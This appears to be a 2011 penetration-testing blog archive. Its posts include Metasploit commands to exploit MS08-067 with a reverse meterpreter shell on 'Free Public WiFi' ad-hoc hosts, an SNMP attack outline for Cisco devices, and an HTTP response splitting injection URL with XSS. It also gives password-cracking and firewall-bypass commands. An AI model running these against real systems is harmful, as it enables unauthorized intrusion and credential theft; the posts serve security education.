Category Archives: Fu (a.k.a Tips)

Exploiting “Free Public WiFi”

1
Posted by Skyler on November 2, 2011 – 12:05 pm
Filed under Network Hacking

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

  • Connect to the adhoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
  • Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)
  • Configure your IP (for the reverse shell to shovel back to)
# ifconfig wlan1 196.254.1.1 netmask 255.255.0.0
  • Own It
# msconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST 169.254.131.118
# set LHOST 169.254.1.1
# exploit


Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic!





				
				
			



			

				
Linux Shells With Built In Tools


				                
0

                 

				

				

					Posted by Skyler on May 29, 2011 – 12:14 am
				

				

					Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
									
				
				


I love posts like these, 7 linux shells using only built in tools!



				
				
			



			

				
A Good Lesson By Barracuda Labs


				                
0

                 

				

				

					Posted by Skyler on April 28, 2011 – 4:11 pm
				

				

					Filed under Defense, Fu (a.k.a Tips)
									
				
				


Barracuda Labs puts out many popular security devices and other defensive solutions. They have recently suffered a SQL injection attack on their site that compromised some of their email contacts. Here is their official posting and dissection of the attack.


The important lesson to be learned here is not necessarily how the attack was done or how it was detected. The important thing is identifying why the attack was able to happen at all. Many people would overlook a single fault like an unsanitized input field, or a misconfigured WAF, etc. On their own these issues may be dangerous for a smaller organization, but a larger organization may overlook the attack surface that each of these weaknesses creates when they are aggregated.



				
				
			



			

				
Hacking Cisco with SNMP In a few simple steps


				                
0

                 

				

				

					Posted by Skyler on April 7, 2011 – 8:11 am
				

				

					Filed under Fu (a.k.a Tips), Network Hacking
									
				
				


Being able to evaluate the strength of a customers infrastructure is a very important part of a penetration test. Many pen testers limit their tests by overlooking the SNMP protocol and the devices that use it. With a successful discovery of SNMP Community Strings you can go as far as to reconfigure a device for remote access (ssh, telnet, http/https) or setup a SPAN port to sniff internal traffic. Before we start there are a few things you should know about SNMP:


    

  • UDP Port 161. Since its UDP its fast.
    • 

  • Community Strings provide either Read or Read-Write permissions. Obviously we prefer RW.
    • 

  • SNMP v1-v2 is clear text. v3 is encrypted.
    • 



Here is the usual process taken to attack SNMP and the tools that will help you do it.


    

  1. Obtain Community Strings


    2. 

  2. Setup TFTP Server
    3. 

  3. Identify Updating MIB


    4. 

  4. Download Device Configs


    5. 

  5. Crack Enable Passwords (salted MD5)


    6. 

  6. Modify Config
    7. 

  7. Update Device Config


    8. 



You can see that these steps are pretty straight forward. Have fun experimenting with the tools. I would HIGHLY discourage attacking SNMP in a production environment unless you have thoroughly experimented with the process in a controlled lab. 



				
				
			



			

				
Detecting Intrusions That Spoof svchost.exe


				                
2

                 

				

				

					Posted by Skyler on March 31, 2011 – 6:44 am
				

				

					Filed under Defense, Fu (a.k.a Tips)
									
				
				


One of the common things an attacker may do once they are inside your machine is to rename the process they are running as. In many cases they will try to imitate or get very close to normal system process names. One common process to spoof is the svchost process.


What is svchost?


Microsoft states that “svchost.exe is a generic host process name for services that run from dynamic-link libraries”. So when a piece of software starts a service from a dll, it will be found connected to an svchost instance.


So what?


Well, if that is the case then we can rest assured that any svchost process will also have some services running under it. The following command will show us the svchost instances and what services are under it:

C:\> tasklist /SVC


If we then notice any svchost.exe instances running without any services under it, then it is most likely another process that has renamed itself to look like svchost.



				
				
			



			

				
HTTP Response Splitting


				                
1

                 

				

				

					Posted by Skyler on March 30, 2011 – 1:20 am
				

				

					Filed under Fu (a.k.a Tips), Research, Web Hacking
									
				
				




HTTP Response Splitting


 


The glory days of remote code execution exploitation are gone. Client side injection attacks have become today’s standard for attackers. The idea behind a client side injection attack is that the attacker is able to break out of an applications context to allow the execution of user provided data. The most familiar attacks of this class are: Cross-Site Scripting (XSS), Cross Site Request Forgery (CSRF), and SQL Injection. However, the theory of injection goes far beyond the inclusion of javascript or SQL in dynamic content. One of those less noticed attacks includes the HTTP Response Splitting attack (HRS). Although this attack was discovered in 2002, the security community still remains mostly aloof to its existence and exact mechanics [1]. Unfortunately this lack of knowledge leaves many to assume that such an attack is mostly harmless when compared to other attacks; in reality it is quite the opposite [4].


 


Overview


 


Normal HTTP traffic uses a one-to-one queue for request-response communication. The request agent will remember sending a single request and will expect a single response in return. Any additional responses are still added to the queue and remain there until the client is expecting a response. Because a queue is being used the first response in priority may not actually be the response associated with the most recent request [2]. An HRS attack exploits this functionality.


The attack involves three parties. The first of these parties is a vulnerable web server. The second party is the target; usually a web proxy or caching system. The third and final party is the attacker himself. When the appropriate environment exists, the attacker is able to alter a single request to appear and be processed by the web server as two requests. The web server in turn responds to each request. As those two responses return to the target, the cache/proxy will forward on the first response but will store the second one. As the agent submits another request the proxy will send the next response in the queue, which happens to be the response associated with the injected request. This can lead to a variety of attack vectors that will be discussed later.


 


How It Is Done


 


The vulnerability exists where user provided input is stored within the request’s HTTP headers. Lets use a simple redirect page as an example:


 


<?php header (“Location: “ .  $_GET[‘page’]); ?>


 


This script will take whatever value is passed for the value of ‘page’ and use it within an HTTP header to redirect to a new page [4]. If I were to provide the value of ‘www.foobar.com’, the associated HTTP response would look as such:


 


HTTP/1.1 302 Found


Date: Wed, 16 Mar 2011 19:49:28 GMT


Server: Apache/2.2.17 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.8o


Location: http://www.foobar.com


Keep-Alive: timeout=15, max=100


Connection: Keep-Alive


Transfer-Encoding: chunked


Content-Type: text/html


 


In such a situation the user’s browser would process this response and forward the user to the value of ‘Location:’. However, because the value of ‘page’ is not being scrubbed prior to being inserted into our HTTP header, it presents an opportunity for injection.


In order to manipulate the HTTP request we must understand the HTTP Protocol and its rules on the formatting of HTTP headers. The rule that relates to HRS is the specification of Carriage Return-Line Feeds (CRLF, or (\r\n). The use of CRLF in injection attacks has been around for some time [3]. It has been used to exploit many protocols and applications in order to bypass restrictions and manipulate data. In regards to HTTP, the protocol defines that each header will be separated with a single CRLF(\r\n), while the content  will be separated from the headers by two CRLF(\r\n\r\n). Following these rules an attacker can inject a completely new request into the vulnerable header. Here is an example of an injection string, as it would look as a request to our redirect script:


 


http://www.vulnerablesite.com/redirect.php?page=nonsense%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<script>alert(/XSS/.source)</script>


 


Here we see that a normal looking request has been constructed using encoded values of the CRLF characters. The body of the response contains a XSS attack that is not limited as many other XSS attacks are. As the user submits their next request, the injected XSS response will be returned and executed in their browser [1].


 


Damage Potential


 


Cross-Site Scripting: This attack is what was demonstrated in our above examples. Essentially, the injected response could include any javascript code the attacker desires.[4]


 


Cross-User Defacement: This attack causes a defacement/spoofing type of condition on one specific user. This attack could be used in conjunction with other attack vectors to steal cookies and session data as well as other information about the user.[4]


 


Web Cache Poisoning: This attack is similar to Cross-User Defacement but instead it targets an entire group of users. It does this by poisoning the cache of a proxy that multiple systems communicate with and through. This causes the before mentioned exploited condition to be applied to multiple targets.[4]


 


Page Hijacking: The attacker can use this method to intercept the web server’s response to a users request. That request may contain important and private information that would now be sent to the attacker. [4]


 


Browser Cache Poisoning: This attack causes persistence of the defacement condition by forcing the browser to cache the targeted page.[4]


 


Mitigations


 


The primary mitigations against the HRS attack is two-fold. First, scrub user input of all CR & LF characters. Only insert them if you intend for them to be there. Secondly, check for encoded values and either escape them or sanitize them [4].


 


Conclusion


 


I hope that this has opened the eyes of the reader to better understanding injection theory, the vast scope of attacks that exist, and the importance of secure coding practices. I encourage the reader to go and do further research on the topics discussed here.






[1] Divide and Conquer


This is the article written by the discoverer of the HTTP Response Splitting attack. Readers should use this is an in depth reference to HRS in the real world. The author not only explains the attack and demonstrates its use, but also discusses evasion techniques that allow attackers to perform HRS upon targets with protection. The reader should grasp the full and indepth understanding of the danger and applications of the HRS attack in the real world.


[2] HTTP Response Splitting


This article gives a clear and concise breakdown of the HTTP Response Splitting attack. The theory and methodology of the attack is explained in a clear manner as well as explinations and examples. This article should serve as a means to allow the reader to grasp the overall idea behind HRS.


[3] Bugtraq: CRLF Injection


This article discusses the possibilities of the CRLF problem that make the HTTP Response Splitting attack possible. Not only does the author explain HRS, but he shows how abusing unfiltered input could allow him to create false log entries and other forms of manipulation. The reader should be able to understand the theory behind HRS and recognize other possibilities related to unfiltered CR-LF in all types of systems.


[4] Introdution to HTTP Response Splitting


This article talks more specifically about the different attack vectors that HTTP Response Splitting presents. The author gives exact examples to demonstrate each payload/vector in a clear manner. The reader should be able to conceptualize how the formation of an HRS attack would look like and therefore how to prevent it.


[5] OWASP: HTTP Response Splitting 


This article is the official refernece for HTTP Response Splitting provided by the Open Web Application Security Project. This article is aimed towards the application developer. The information here gives a simple example of what a vulnerable target would look like and how a programmer would therefore be able to spot and mitigate the attack. After reading, the reader should be able to recognize a vulnerable target by looking at its request headers.




 



				
				
			



			

				
Skills for Pen Testers


				                
0

                 

				

				

					Posted by Skyler on March 25, 2011 – 10:56 am
				

				

					Filed under Basics, Fu (a.k.a Tips)
									
				
				




Here are two great links about important skills for penetration testers:


Ideal Skill Set For the Penetration Tester


The Key Skill Set of Great Penetration Testers




 



				
				
			



			

				
OWASP Top 10 Tools and Tactics


				                
0

                 

				

				

					Posted by Skyler on March 21, 2011 – 9:24 pm
				

				

					Filed under Fu (a.k.a Tips), Tools, Web Hacking
									
				
				


This is a great article, I wont risk doing it injustice. Just check it out:


Top 10 Tools and Tactics


Lots of the tools are found here: Samurai-WTF Firefox Add-ons



				
				
			



			

				
John The Ripper Basics


				                
3

                 

				

				

					Posted by Skyler on March 10, 2011 – 7:56 am
				

				

					Filed under Basics, Fu (a.k.a Tips), Tools
									
				
				


A friend was asking about password cracking. He needed an easy tool that also did mutations of passwords within his dictionary. Here is the cheat sheet I made for him to use John:


Basic:


$ john [target file]


Wordlist:


$ john --wordlist=[dictionary file] [target file]




The following tags can be used to add extra functionality:




--rules


Does permutation on the supplied wordlist


--stdout


this combined with a pipe ( | ) can be used to feed a jtr mutated password list into another cracking program.




 


Those are the very basics to john, but that should be enough for a beginner.


Read all about John The Ripper here, and see more jtr command line options here



				
				
			



			

				
Bypassing Firewalls with SYN+FIN


				                
3

                 

				

				

					Posted by Skyler on March 3, 2011 – 9:19 am
				

				

					Filed under Basics, Fu (a.k.a Tips), Uncategorized
									
				
				


There exists a vulnerability within many firewalls and other systems that permit a session to be established in spite of firewall rules. The specifics are outlined here


To briefly demonstrate this, I will craft custom TCP packets with the SYN and FIN flags set. I will use Nmap for my port scanning, and Nemisis for all others:


NMap


 nmap -v -v --scanflags SYNFIN -P0 <target>


Nemesis


 nemesis tcp -v -fS -fF -D <target>  -S <myip>


 


In the case of Nmap, notice how the ports that were originally “filtered” are now “open”. Note, not all systems are vulnerable to this bypass.  Sorry for not having a better demo. Go and try it out on your own and see how it works. enjoy!



				
				
			



			

		

		
	        

	



	

	





Bad Behavior has blocked 275 access attempts in the last 7 days.